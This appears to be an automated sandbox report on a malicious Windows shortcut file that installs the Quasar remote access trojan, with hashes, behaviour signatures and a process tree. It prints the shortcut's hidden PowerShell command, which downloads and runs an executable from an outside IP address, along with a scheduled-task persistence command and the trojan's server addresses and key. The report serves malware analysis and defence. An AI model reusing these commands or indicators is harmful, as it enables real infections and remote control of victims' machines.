Analysis
-
max time kernel
130s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Resource
win7-20240903-en
General
-
Target
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
-
Size
2KB
-
MD5
4a98c5bbf1a94992ec72858d3327a28e
-
SHA1
0fa914c44bdcb63d3631d5ec30cebb5047d12c7a
-
SHA256
184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543
-
SHA512
e60fb58d1f141d3c2ea99bf39d3b0dd872bebc05efa0cfa630e783f4d90b624084988c66621adc4d7dc6434b1c707d1d6c7c1f36ee2fa2e36fefc47b9a7d6ba7
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar
1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
-
encryption_key
7Vp2dMCHrMjJthQ2Elyy
-
install_name
downloads.exe
-
log_directory
Logs
-
reconnect_delay
5000
-
startup_key
cssrse.exe
-
subdirectory
downloadupdates
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2524-29-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 3 5108 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 8 IoCs
Processes:
ujtjewc.exeujtjewc.exeujtjewc.exeujtjewc.exedownloads.exedownloads.exedownloads.exedownloads.exepid Process 4508 ujtjewc.exe 2524 ujtjewc.exe 4952 ujtjewc.exe 3516 ujtjewc.exe 5048 downloads.exe 2660 downloads.exe 3444 downloads.exe 3508 downloads.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
ujtjewc.exedownloads.exedescription pid Process procid_target PID 4508 set thread context of 2524 4508 ujtjewc.exe 91 PID 4508 set thread context of 4952 4508 ujtjewc.exe 92 PID 4508 set thread context of 3516 4508 ujtjewc.exe 93 PID 5048 set thread context of 2660 5048 downloads.exe 103 PID 5048 set thread context of 3444 5048 downloads.exe 104 PID 5048 set thread context of 3508 5048 downloads.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process 32 4952 WerFault.exe 3660 2660 WerFault.exe 1284 3444 WerFault.exe 4392 3508 WerFault.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ujtjewc.exeujtjewc.exeujtjewc.exeschtasks.exedownloads.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ujtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 5108 powershell.exe 5108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeujtjewc.exeujtjewc.exedownloads.exedescription pid Process Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 4508 ujtjewc.exe Token: SeDebugPrivilege 3516 ujtjewc.exe Token: SeDebugPrivilege 5048 downloads.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
ujtjewc.exepid Process 4952 ujtjewc.exe -
Suspicious use of WriteProcessMemory 59 IoCs
Processes:
cmd.exepowershell.exeujtjewc.exeujtjewc.exedownloads.exedescription pid Process procid_target PID 2596 wrote to memory of 5108 2596 cmd.exe 86 PID 2596 wrote to memory of 5108 2596 cmd.exe 86 PID 5108 wrote to memory of 4508 5108 powershell.exe 90 PID 5108 wrote to memory of 4508 5108 powershell.exe 90 PID 5108 wrote to memory of 4508 5108 powershell.exe 90 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 2524 4508 ujtjewc.exe 91 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 4952 4508 ujtjewc.exe 92 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 4508 wrote to memory of 3516 4508 ujtjewc.exe 93 PID 3516 wrote to memory of 2696 3516 ujtjewc.exe 99 PID 3516 wrote to memory of 2696 3516 ujtjewc.exe 99 PID 3516 wrote to memory of 2696 3516 ujtjewc.exe 99 PID 3516 wrote to memory of 5048 3516 ujtjewc.exe 101 PID 3516 wrote to memory of 5048 3516 ujtjewc.exe 101 PID 3516 wrote to memory of 5048 3516 ujtjewc.exe 101 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 2660 5048 downloads.exe 103 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3444 5048 downloads.exe 104 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105 PID 5048 wrote to memory of 3508 5048 downloads.exe 105
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ujtjewc.exe');./'ujtjewc.exe';(get-item 'ujtjewc.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2524
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:4952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 125⤵
- Program crash
PID:32
-
-
-
C:\Users\Admin\AppData\Local\Temp\ujtjewc.exeC:\Users\Admin\AppData\Local\Temp\ujtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2696
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
PID:2660 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 807⤵
- Program crash
PID:3660
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
PID:3444 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 807⤵
- Program crash
PID:1284
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
PID:3508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 807⤵
- Program crash
PID:4392
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4952 -ip 49521⤵PID:748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2660 -ip 26601⤵PID:4660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3444 -ip 34441⤵PID:4884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3508 -ip 35081⤵PID:4424
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
522B
MD50f39d6b9afc039d81ff31f65cbf76826
SHA18356d04fe7bba2695d59b6caf5c59f58f3e1a6d8
SHA256ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d
SHA5125bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
774KB
MD5b8fc2efcc33d3160f38fcb6b39319e6a
SHA1a61413a5b6c19b4a388e6c89aaa9304c657b3e08
SHA2563df20b1c9806c327d72824f1b9a4ffcbe702d152fbf11fca42a36c862cbafd0a
SHA512ba4ef7ec5dd7b9ad8ec49ef73315bded8ecc72212b11e3a1384b6d4f3f264867312cda41268a8d1df6fc8c3caa63813c15aa4ff29f0324360a95d59de3456d3b